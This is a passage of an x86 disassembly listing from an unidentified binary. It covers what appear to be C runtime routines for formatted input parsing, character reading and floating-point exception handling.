inc esi
jmp short loc_4208B6
; ---------------------------------------------------------------------------
loc_4208B1: ; CODE XREF: sub_420510+39A�j
cmp ebx, 2Bh
jnz short loc_4208D4
loc_4208B6: ; CODE XREF: sub_420510+39F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jnz short loc_4208C5
and [ebp+var_C], eax
jmp short loc_4208D4
; ---------------------------------------------------------------------------
loc_4208C5: ; CODE XREF: sub_420510+3AE�j
; sub_420510+3F8�j
inc [ebp+var_4]
push edi
call sub_420F6C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_4208D4: ; CODE XREF: sub_420510+3A4�j
; sub_420510+3B3�j
cmp dword_43CBE4, 1
jle short loc_4208E9
push 4
push ebx
call sub_41F515
pop ecx
pop ecx
jmp short loc_4208F4
; ---------------------------------------------------------------------------
loc_4208E9: ; CODE XREF: sub_420510+3CB�j
mov eax, off_43C9D8
mov al, [eax+ebx*2]
and eax, 4
loc_4208F4: ; CODE XREF: sub_420510+3D7�j
test eax, eax
jz short loc_42090A
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_42090A
inc [ebp+var_1C]
mov [esi], bl
inc esi
jmp short loc_4208C5
; ---------------------------------------------------------------------------
loc_42090A: ; CODE XREF: sub_420510+366�j
; sub_420510+374�j ...
dec [ebp+var_4]
push edi
push ebx
call sub_420F86
cmp [ebp+var_1C], 0
pop ecx
pop ecx
jz loc_420F16
cmp [ebp+var_E], 0
jnz loc_420E77
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C4]
push eax
movsx eax, [ebp+var_D]
push [ebp+var_2C]
dec eax
push eax
call off_43CF88
add esp, 0Ch
jmp loc_420E77
; ---------------------------------------------------------------------------
loc_42094E: ; CODE XREF: sub_420510+20C�j
cmp [ebp+var_20], eax
jnz short loc_42095D
inc [ebp+var_C]
mov [ebp+var_20], 1
loc_42095D: ; CODE XREF: sub_420510+441�j
cmp [ebp+var_5], 0
jle short loc_420967
mov [ebp+var_16], 1
loc_420967: ; CODE XREF: sub_420510+451�j
mov edi, offset dword_43CE60
jmp loc_420A7C
; ---------------------------------------------------------------------------
loc_420971: ; CODE XREF: sub_420510+1FD�j
mov eax, esi
sub eax, 70h
jz loc_420C1F
sub eax, 3
jz loc_420A6D
dec eax
dec eax
jz loc_420C23
sub eax, 3
jz loc_420759
sub eax, 3
jz short loc_4209BF
loc_42099B: ; CODE XREF: sub_420510+21B�j
; sub_420510+22E�j
movzx eax, byte ptr [ebx]
cmp eax, [ebp+var_14]
jnz loc_420EE6
dec [ebp+var_15]
cmp [ebp+var_E], 0
jnz loc_420E77
mov eax, [ebp+var_44]
mov [ebp+arg_8], eax
jmp loc_420E77
; ---------------------------------------------------------------------------
loc_4209BF: ; CODE XREF: sub_420510+489�j
cmp [ebp+var_5], 0
jle short loc_4209C9
mov [ebp+var_16], 1
loc_4209C9: ; CODE XREF: sub_420510+4B3�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
cmp byte ptr [edi], 5Eh
jnz loc_420A80
mov eax, edi
lea edi, [eax+1]
jmp loc_420A7C
; ---------------------------------------------------------------------------
loc_4209E3: ; CODE XREF: sub_420510+24F�j
cmp ebx, 2Bh
jnz short loc_420A0A
loc_4209E8: ; CODE XREF: sub_420510+259�j
dec [ebp+var_C]
jnz short loc_4209F9
cmp [ebp+var_20], 0
jz short loc_4209F9
mov [ebp+var_F], 1
jmp short loc_420A0A
; ---------------------------------------------------------------------------
loc_4209F9: ; CODE XREF: sub_420510+4DB�j
; sub_420510+4E1�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_420F6C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_420A0A: ; CODE XREF: sub_420510+4D6�j
; sub_420510+4E7�j
cmp ebx, 30h
jnz loc_420C58
push [ebp+arg_0]
inc [ebp+var_4]
call sub_420F6C
mov ebx, eax
pop ecx
cmp bl, 78h
mov [ebp+var_14], ebx
jz short loc_420A58
cmp bl, 58h
jz short loc_420A58
cmp esi, 78h
mov [ebp+var_1C], 1
jz short loc_420A42
push 6Fh
loc_420A3C: ; CODE XREF: sub_420510+55B�j
pop esi
jmp loc_420C58
; ---------------------------------------------------------------------------
loc_420A42: ; CODE XREF: sub_420510+528�j
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_420F86
pop ecx
pop ecx
push 30h
pop ebx
jmp loc_420C55
; ---------------------------------------------------------------------------
loc_420A58: ; CODE XREF: sub_420510+517�j
; sub_420510+51C�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_420F6C
pop ecx
mov ebx, eax
mov [ebp+var_14], ebx
push 78h
jmp short loc_420A3C
; ---------------------------------------------------------------------------
loc_420A6D: ; CODE XREF: sub_420510+46F�j
cmp [ebp+var_5], 0
jle short loc_420A77
mov [ebp+var_16], 1
loc_420A77: ; CODE XREF: sub_420510+561�j
mov edi, offset dword_43CE58
loc_420A7C: ; CODE XREF: sub_420510+45C�j
; sub_420510+4CE�j
or [ebp+var_18], 0FFh
loc_420A80: ; CODE XREF: sub_420510+4C3�j
push 20h
lea eax, [ebp+var_64]
push 0
push eax
call sub_41B590
add esp, 0Ch
cmp [ebp+var_3C], 7Bh
jnz short loc_420AA4
cmp byte ptr [edi], 5Dh
jnz short loc_420AA4
mov dl, 5Dh
inc edi
mov [ebp+var_59], 20h
jmp short loc_420AA7
; ---------------------------------------------------------------------------
loc_420AA4: ; CODE XREF: sub_420510+584�j
; sub_420510+589�j
mov dl, [ebp+var_35]
loc_420AA7: ; CODE XREF: sub_420510+592�j
; sub_420510+5E1�j ...
mov al, [edi]
cmp al, 5Dh
jz short loc_420B0C
inc edi
cmp al, 2Dh
jnz short loc_420AF3
test dl, dl
jz short loc_420AF3
mov cl, [edi]
cmp cl, 5Dh
jz short loc_420AF3
inc edi
cmp dl, cl
jnb short loc_420AC6
mov al, cl
jmp short loc_420ACA
; ---------------------------------------------------------------------------
loc_420AC6: ; CODE XREF: sub_420510+5B0�j
mov al, dl
mov dl, cl
loc_420ACA: ; CODE XREF: sub_420510+5B4�j
cmp dl, al
ja short loc_420AEF
movzx edx, dl
movzx esi, al
sub esi, edx
inc esi
loc_420AD7: ; CODE XREF: sub_420510+5DD�j
mov ecx, edx
mov eax, edx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
inc edx
dec esi
jnz short loc_420AD7
loc_420AEF: ; CODE XREF: sub_420510+5BC�j
xor dl, dl
jmp short loc_420AA7
; ---------------------------------------------------------------------------
loc_420AF3: ; CODE XREF: sub_420510+5A0�j
; sub_420510+5A4�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
jmp short loc_420AA7
; ---------------------------------------------------------------------------
loc_420B0C: ; CODE XREF: sub_420510+59B�j
cmp byte ptr [edi], 0
jz loc_420F16
cmp [ebp+var_3C], 7Bh
jnz short loc_420B1E
mov [ebp+arg_4], edi
loc_420B1E: ; CODE XREF: sub_420510+609�j
mov edi, [ebp+arg_0]
mov esi, [ebp+var_2C]
dec [ebp+var_4]
push edi
push [ebp+var_14]
mov [ebp+var_30], esi
call sub_420F86
pop ecx
pop ecx
loc_420B35: ; CODE XREF: sub_420510+6BC�j
; sub_420510+6C4�j
cmp [ebp+var_20], 0
jz short loc_420B49
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz loc_420BE5
loc_420B49: ; CODE XREF: sub_420510+629�j
inc [ebp+var_4]
push edi
call sub_420F6C
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jz short loc_420BD9
mov ecx, eax
push 1
and ecx, 7
pop edx
movsx ebx, [ebp+var_18]
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, [ebp+ecx+var_64]
xor ecx, ebx
test edx, ecx
jz short loc_420BD9
cmp [ebp+var_E], 0
jnz short loc_420BD1
cmp [ebp+var_16], 0
jz short loc_420BC6
mov ecx, off_43C9D8
mov [ebp+var_38], al
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_420BA5
inc [ebp+var_4]
push edi
call sub_420F6C
pop ecx
mov [ebp+var_37], al
loc_420BA5: ; CODE XREF: sub_420510+686�j
push dword_43CBE4
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_3E]
push eax
call sub_423EC3
mov ax, [ebp+var_3E]
add esp, 0Ch
mov [esi], ax
inc esi
inc esi
jmp short loc_420BC9
; ---------------------------------------------------------------------------
loc_420BC6: ; CODE XREF: sub_420510+673�j
mov [esi], al
inc esi
loc_420BC9: ; CODE XREF: sub_420510+6B4�j
mov [ebp+var_2C], esi
jmp loc_420B35
; ---------------------------------------------------------------------------
loc_420BD1: ; CODE XREF: sub_420510+66D�j
inc [ebp+var_30]
jmp loc_420B35
; ---------------------------------------------------------------------------
loc_420BD9: ; CODE XREF: sub_420510+649�j
; sub_420510+667�j
dec [ebp+var_4]
push edi
push eax
call sub_420F86
pop ecx
pop ecx
loc_420BE5: ; CODE XREF: sub_420510+633�j
cmp [ebp+var_30], esi
jz loc_420F16
cmp [ebp+var_E], 0
jnz loc_420E77
inc [ebp+var_34]
cmp [ebp+var_3C], 63h
jz loc_420E77
cmp [ebp+var_16], 0
mov eax, [ebp+var_2C]
jz short loc_420C17
and word ptr [eax], 0
jmp loc_420E77
; ---------------------------------------------------------------------------
loc_420C17: ; CODE XREF: sub_420510+6FC�j
and byte ptr [eax], 0
jmp loc_420E77
; ---------------------------------------------------------------------------
loc_420C1F: ; CODE XREF: sub_420510+466�j
mov [ebp+var_D], 1
loc_420C23: ; CODE XREF: sub_420510+203�j
; sub_420510+215�j ...
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz short loc_420C31
mov [ebp+var_17], 1
jmp short loc_420C36
; ---------------------------------------------------------------------------
loc_420C31: ; CODE XREF: sub_420510+719�j
cmp ebx, 2Bh
jnz short loc_420C58
loc_420C36: ; CODE XREF: sub_420510+71F�j
dec [ebp+var_C]
jnz short loc_420C47
cmp [ebp+var_20], 0
jz short loc_420C47
mov [ebp+var_F], 1
jmp short loc_420C58
; ---------------------------------------------------------------------------
loc_420C47: ; CODE XREF: sub_420510+729�j
; sub_420510+72F�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_420F6C
pop ecx
mov ebx, eax
loc_420C55: ; CODE XREF: sub_420510+543�j
mov [ebp+var_14], ebx
loc_420C58: ; CODE XREF: sub_420510+4FD�j
; sub_420510+52D�j ...
cmp [ebp+var_30], 0
jz loc_420D71
cmp [ebp+var_F], 0
jnz loc_420D4F
loc_420C6C: ; CODE XREF: sub_420510+82C�j
cmp esi, 78h
jnz short loc_420CC0
cmp dword_43CBE4, 1
jle short loc_420C89
push 80h
push ebx
call sub_41F515
pop ecx
pop ecx
jmp short loc_420C96
; ---------------------------------------------------------------------------
loc_420C89: ; CODE XREF: sub_420510+768�j
mov eax, off_43C9D8
mov al, [eax+ebx*2]
and eax, 80h
loc_420C96: ; CODE XREF: sub_420510+777�j
test eax, eax
jz loc_420D41
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 4
pop ecx
call sub_423F90
push ebx
mov [ebp+var_28], eax
mov [ebp+var_24], edx
call sub_420F35
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_420D13
; ---------------------------------------------------------------------------
loc_420CC0: ; CODE XREF: sub_420510+75F�j
cmp dword_43CBE4, 1
jle short loc_420CD5
push 4
push ebx
call sub_41F515
pop ecx
pop ecx
jmp short loc_420CE0
; ---------------------------------------------------------------------------
loc_420CD5: ; CODE XREF: sub_420510+7B7�j
mov eax, off_43C9D8
mov al, [eax+ebx*2]
and eax, 4
loc_420CE0: ; CODE XREF: sub_420510+7C3�j
test eax, eax
jz short loc_420D41
cmp esi, 6Fh
jnz short loc_420CFE
cmp ebx, 38h
jge short loc_420D41
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 3
pop ecx
call sub_423F90
jmp short loc_420D0D
; ---------------------------------------------------------------------------
loc_420CFE: ; CODE XREF: sub_420510+7D7�j
push 0
push 0Ah
push [ebp+var_24]
push [ebp+var_28]
call sub_41D280
loc_420D0D: ; CODE XREF: sub_420510+7EC�j
mov [ebp+var_28], eax
mov [ebp+var_24], edx
loc_420D13: ; CODE XREF: sub_420510+7AE�j
inc [ebp+var_1C]
lea eax, [ebx-30h]
cdq
add [ebp+var_28], eax
adc [ebp+var_24], edx
cmp [ebp+var_20], 0
jz short loc_420D2B
dec [ebp+var_C]
jz short loc_420D4F
loc_420D2B: ; CODE XREF: sub_420510+814�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_420F6C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_420C6C
; ---------------------------------------------------------------------------
loc_420D41: ; CODE XREF: sub_420510+788�j
; sub_420510+7D2�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_420F86
pop ecx
pop ecx
loc_420D4F: ; CODE XREF: sub_420510+756�j
; sub_420510+819�j
cmp [ebp+var_17], 0
jz loc_420E35
mov eax, [ebp+var_28]
mov ecx, [ebp+var_24]
neg eax
adc ecx, 0
mov [ebp+var_28], eax
neg ecx
mov [ebp+var_24], ecx
jmp loc_420E35
; ---------------------------------------------------------------------------
loc_420D71: ; CODE XREF: sub_420510+74C�j
cmp [ebp+var_F], 0
jnz loc_420E2D
loc_420D7B: ; CODE XREF: sub_420510+90A�j
cmp esi, 78h
jz short loc_420DBF
cmp esi, 70h
jz short loc_420DBF
cmp dword_43CBE4, 1
jle short loc_420D9A
push 4
push ebx
call sub_41F515
pop ecx
pop ecx
jmp short loc_420DA5
; ---------------------------------------------------------------------------
loc_420D9A: ; CODE XREF: sub_420510+87C�j
mov eax, off_43C9D8
mov al, [eax+ebx*2]
and eax, 4
loc_420DA5: ; CODE XREF: sub_420510+888�j
test eax, eax
jz short loc_420E1F
cmp esi, 6Fh
jnz short loc_420DB8
cmp ebx, 38h
jge short loc_420E1F
shl edi, 3
jmp short loc_420DF7
; ---------------------------------------------------------------------------
loc_420DB8: ; CODE XREF: sub_420510+89C�j
lea edi, [edi+edi*4]
shl edi, 1
jmp short loc_420DF7
; ---------------------------------------------------------------------------
loc_420DBF: ; CODE XREF: sub_420510+86E�j
; sub_420510+873�j
cmp dword_43CBE4, 1
jle short loc_420DD7
push 80h
push ebx
call sub_41F515
pop ecx
pop ecx
jmp short loc_420DE4
; ---------------------------------------------------------------------------
loc_420DD7: ; CODE XREF: sub_420510+8B6�j
mov eax, off_43C9D8
mov al, [eax+ebx*2]
and eax, 80h
loc_420DE4: ; CODE XREF: sub_420510+8C5�j
test eax, eax
jz short loc_420E1F
push ebx
shl edi, 4
call sub_420F35
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_420DF7: ; CODE XREF: sub_420510+8A6�j
; sub_420510+8AD�j
inc [ebp+var_1C]
cmp [ebp+var_20], 0
lea edi, [edi+ebx-30h]
jz short loc_420E09
dec [ebp+var_C]
jz short loc_420E2D
loc_420E09: ; CODE XREF: sub_420510+8F2�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_420F6C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_420D7B
; ---------------------------------------------------------------------------
loc_420E1F: ; CODE XREF: sub_420510+897�j
; sub_420510+8A1�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_420F86
pop ecx
pop ecx
loc_420E2D: ; CODE XREF: sub_420510+865�j
; sub_420510+8F7�j
cmp [ebp+var_17], 0
jz short loc_420E35
neg edi
loc_420E35: ; CODE XREF: sub_420510+843�j
; sub_420510+85C�j ...
cmp esi, 46h
jnz short loc_420E3E
and [ebp+var_1C], 0
loc_420E3E: ; CODE XREF: sub_420510+928�j
cmp [ebp+var_1C], 0
jz loc_420F16
cmp [ebp+var_E], 0
jnz short loc_420E77
inc [ebp+var_34]
loc_420E51: ; CODE XREF: sub_420510+23B�j
cmp [ebp+var_30], 0
jz short loc_420E67
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_28]
mov [eax], ecx
mov ecx, [ebp+var_24]
mov [eax+4], ecx
jmp short loc_420E77
; ---------------------------------------------------------------------------
loc_420E67: ; CODE XREF: sub_420510+945�j
cmp [ebp+var_D], 0
mov eax, [ebp+var_2C]
jz short loc_420E74
mov [eax], edi
jmp short loc_420E77
; ---------------------------------------------------------------------------
loc_420E74: ; CODE XREF: sub_420510+95E�j
mov [eax], di
loc_420E77: ; CODE XREF: sub_420510+241�j
; sub_420510+414�j ...
inc [ebp+var_15]
inc [ebp+arg_4]
mov esi, [ebp+arg_4]
jmp short loc_420EC4
; ---------------------------------------------------------------------------
loc_420E82: ; CODE XREF: sub_420510+93�j
inc [ebp+var_4]
push edi
call sub_420F6C
mov ebx, eax
pop ecx
movzx eax, byte ptr [esi]
inc esi
cmp eax, ebx
mov [ebp+var_14], ebx
mov [ebp+arg_4], esi
jnz short loc_420EF1
mov ecx, off_43C9D8
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_420EC4
inc [ebp+var_4]
push edi
call sub_420F6C
pop ecx
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, eax
mov [ebp+arg_4], esi
jnz short loc_420EFF
dec [ebp+var_4]
loc_420EC4: ; CODE XREF: sub_420510+970�j
; sub_420510+99A�j
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_420EDA
cmp byte ptr [esi], 25h
jnz short loc_420F1C
mov eax, [ebp+arg_4]
cmp byte ptr [eax+1], 6Eh
jnz short loc_420F1C
mov esi, eax
loc_420EDA: ; CODE XREF: sub_420510+9B8�j
mov al, [esi]
test al, al
jnz loc_42053A
jmp short loc_420F16
; ---------------------------------------------------------------------------
loc_420EE6: ; CODE XREF: sub_420510+1F4�j
; sub_420510+491�j
push [ebp+arg_0]
dec [ebp+var_4]
push [ebp+var_14]
jmp short loc_420EF6
; ---------------------------------------------------------------------------
loc_420EF1: ; CODE XREF: sub_420510+98A�j
dec [ebp+var_4]
push edi
push ebx
loc_420EF6: ; CODE XREF: sub_420510+9DF�j
call sub_420F86
pop ecx
pop ecx
jmp short loc_420F16
; ---------------------------------------------------------------------------
loc_420EFF: ; CODE XREF: sub_420510+9AF�j
dec [ebp+var_4]
push edi
push eax
call sub_420F86
dec [ebp+var_4]
push edi
push ebx
call sub_420F86
add esp, 10h
loc_420F16: ; CODE XREF: sub_420510+1F�j
; sub_420510+40A�j ...
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_420F2D
loc_420F1C: ; CODE XREF: sub_420510+9BD�j
; sub_420510+9C6�j
mov eax, [ebp+var_34]
test eax, eax
jnz short loc_420F30
cmp [ebp+var_15], al
jnz short loc_420F30
or eax, 0FFFFFFFFh
jmp short loc_420F30
; ---------------------------------------------------------------------------
loc_420F2D: ; CODE XREF: sub_420510+A0A�j
mov eax, [ebp+var_34]
loc_420F30: ; CODE XREF: sub_420510+A11�j
; sub_420510+A16�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_420510 endp
; =============== S U B R O U T I N E =======================================
sub_420F35 proc near ; CODE XREF: sub_420510+7A3�p
; sub_420510+8DC�p
arg_0 = dword ptr 4
cmp dword_43CBE4, 1
push esi
jle short loc_420F4F
mov esi, [esp+4+arg_0]
push 4
push esi
call sub_41F515
pop ecx
pop ecx
jmp short loc_420F5E
; ---------------------------------------------------------------------------
loc_420F4F: ; CODE XREF: sub_420F35+8�j
mov esi, [esp+4+arg_0]
mov eax, off_43C9D8
mov al, [eax+esi*2]
and eax, 4
loc_420F5E: ; CODE XREF: sub_420F35+18�j
test eax, eax
jnz short loc_420F68
and esi, 0FFFFFFDFh
sub esi, 7
loc_420F68: ; CODE XREF: sub_420F35+2B�j
mov eax, esi
pop esi
retn
sub_420F35 endp
; =============== S U B R O U T I N E =======================================
sub_420F6C proc near ; CODE XREF: sub_420510+1E1�p
; sub_420510+289�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
dec dword ptr [edx+4]
js short loc_420F7E
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_420F7E: ; CODE XREF: sub_420F6C+7�j
push edx
call sub_41F043
pop ecx
retn
sub_420F6C endp
; =============== S U B R O U T I N E =======================================
sub_420F86 proc near ; CODE XREF: sub_420510+6B�p
; sub_420510+3FF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFFFh
jz short locret_420F9C
push [esp+arg_4]
push [esp+4+arg_0]
call sub_423FAF
pop ecx
pop ecx
locret_420F9C: ; CODE XREF: sub_420F86+5�j
retn
sub_420F86 endp
; =============== S U B R O U T I N E =======================================
sub_420F9D proc near ; CODE XREF: sub_420510+63�p
; sub_420510+1D3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
loc_420FA3: ; CODE XREF: sub_420F9D+1D�j
push [esp+8+arg_4]
inc dword ptr [esi]
call sub_420F6C
mov edi, eax
push edi
call sub_41D670
pop ecx
test eax, eax
pop ecx
jnz short loc_420FA3
mov eax, edi
pop edi
pop esi
retn
sub_420F9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __fastcall sub_420FC1(int,int,double,int)
sub_420FC1 proc near ; CODE XREF: sub_41C679+51�p
; sub_41C7BF+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp dword_43D350, 0
jnz short loc_420FF6
push [ebp+arg_C] ; int
fld qword ptr [ebp+arg_4]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
push ecx ; int
push ecx ; int
fldz
fstp [esp+14h+var_14]
fld qword ptr [ebp+arg_4]
push ecx ; int
push ecx ; int
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_421576
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420FF6: ; CODE XREF: sub_420FC1+A�j
push 0FFFFh
mov ds:dword_4DB958, 21h
push [ebp+arg_C]
call sub_4217E9
fld qword ptr [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_420FC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_421014(int,int,double,double,int)
sub_421014 proc near ; CODE XREF: sub_41C679:loc_41C73C�p
; sub_41C7BF:loc_41C882�p
var_74 = qword ptr -74h
var_6C = qword ptr -6Ch
var_64 = qword ptr -64h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_20 = dword ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_42135F
add esp, 0Ch
test eax, eax
jnz short loc_421052
lea eax, [ebp+arg_10]
and [ebp+var_20], 0FFFFFFFEh
push eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+arg_18]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_58]
push eax
call sub_4210AC
add esp, 18h
loc_421052: ; CODE XREF: sub_421014+1A�j
push [ebp+arg_0]
call sub_421649
cmp dword_43D350, 0
pop ecx
jnz short loc_421090
test eax, eax
jz short loc_421090
push [ebp+arg_18] ; int
fld [ebp+arg_10]
push ecx
push ecx ; double
fstp [esp+64h+var_64]
push ecx ; int
push ecx ; int
fldz
fstp [esp+6Ch+var_6C]
fld [ebp+arg_8]
push ecx ; int
push ecx ; int
fstp [esp+74h+var_74]
push [ebp+arg_4] ; int
push eax ; int
call sub_421576
add esp, 24h
leave
retn
; ---------------------------------------------------------------------------
loc_421090: ; CODE XREF: sub_421014+4E�j
; sub_421014+52�j
push eax
call sub_4215FE
mov [esp+5Ch+var_5C], 0FFFFh
push [ebp+arg_18]
call sub_4217E9
fld [ebp+arg_10]
pop ecx
pop ecx
leave
retn
sub_421014 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4210AC proc near ; CODE XREF: sub_421014+36�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
xor eax, eax
push ebx
push esi
mov [ecx+4], eax
mov ecx, [ebp+arg_0]
push edi
push 1
mov [ecx+8], eax
mov ecx, [ebp+arg_0]
pop ebx
mov [ecx+0Ch], eax
mov cl, byte ptr [ebp+arg_8]
test cl, 10h
jz short loc_4210DE
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Fh
or [eax+4], ebx
loc_4210DE: ; CODE XREF: sub_4210AC+23�j
test cl, 2
jz short loc_4210F1
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000093h
or dword ptr [eax+4], 2
loc_4210F1: ; CODE XREF: sub_4210AC+35�j
test cl, bl
jz short loc_421103
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000091h
or dword ptr [eax+4], 4
loc_421103: ; CODE XREF: sub_4210AC+47�j
test cl, 4
jz short loc_421116
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Eh
or dword ptr [eax+4], 8
loc_421116: ; CODE XREF: sub_4210AC+5A�j
test cl, 8
jz short loc_421129
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000090h
or dword ptr [eax+4], 10h
loc_421129: ; CODE XREF: sub_4210AC+6D�j
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
push 2
mov ecx, [esi]
mov edx, [eax+8]
not ecx
and ecx, ebx
and edx, 0FFFFFFEFh
shl ecx, 4
or ecx, edx
pop edi
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
and ecx, 4
shl ecx, 1
and edx, 0FFFFFFF7h
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 1
and ecx, 4
and edx, 0FFFFFFFBh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 3
and ecx, edi
and edx, 0FFFFFFFDh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 5
and ecx, ebx
and edx, 0FFFFFFFEh
or ecx, edx
mov [eax+8], ecx
call sub_4217CC
test al, bl
jz short loc_4211B2
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_4211B2: ; CODE XREF: sub_4210AC+FD�j
test al, 4
jz short loc_4211BD
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_4211BD: ; CODE XREF: sub_4210AC+108�j
test al, 8
jz short loc_4211C8
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_4211C8: ; CODE XREF: sub_4210AC+113�j
test al, 10h
jz short loc_4211D2
mov ecx, [ebp+arg_0]
or [ecx+0Ch], edi
loc_4211D2: ; CODE XREF: sub_4210AC+11E�j
test al, 20h
jz short loc_4211DC
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_4211DC: ; CODE XREF: sub_4210AC+128�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_42121B
cmp eax, 400h
jz short loc_42120D
cmp eax, 800h
jz short loc_421201
cmp eax, ecx
jnz short loc_421221
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_421221
; ---------------------------------------------------------------------------
loc_421201: ; CODE XREF: sub_4210AC+147�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, edi
jmp short loc_421217
; ---------------------------------------------------------------------------
loc_42120D: ; CODE XREF: sub_4210AC+140�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
loc_421217: ; CODE XREF: sub_4210AC+15F�j
mov [eax], ecx
jmp short loc_421221
; ---------------------------------------------------------------------------
loc_42121B: ; CODE XREF: sub_4210AC+139�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_421221: ; CODE XREF: sub_4210AC+14B�j
; sub_4210AC+153�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_42124C
cmp eax, 200h
jz short loc_42123F
cmp eax, ecx
jnz short loc_421259
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_421259
; ---------------------------------------------------------------------------
loc_42123F: ; CODE XREF: sub_4210AC+185�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_421257
; ---------------------------------------------------------------------------
loc_42124C: ; CODE XREF: sub_4210AC+17E�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_421257: ; CODE XREF: sub_4210AC+19E�j
mov [eax], ecx
loc_421259: ; CODE XREF: sub_4210AC+189�j
; sub_4210AC+191�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
and ecx, 0FFFh
mov edx, [eax]
shl ecx, 5
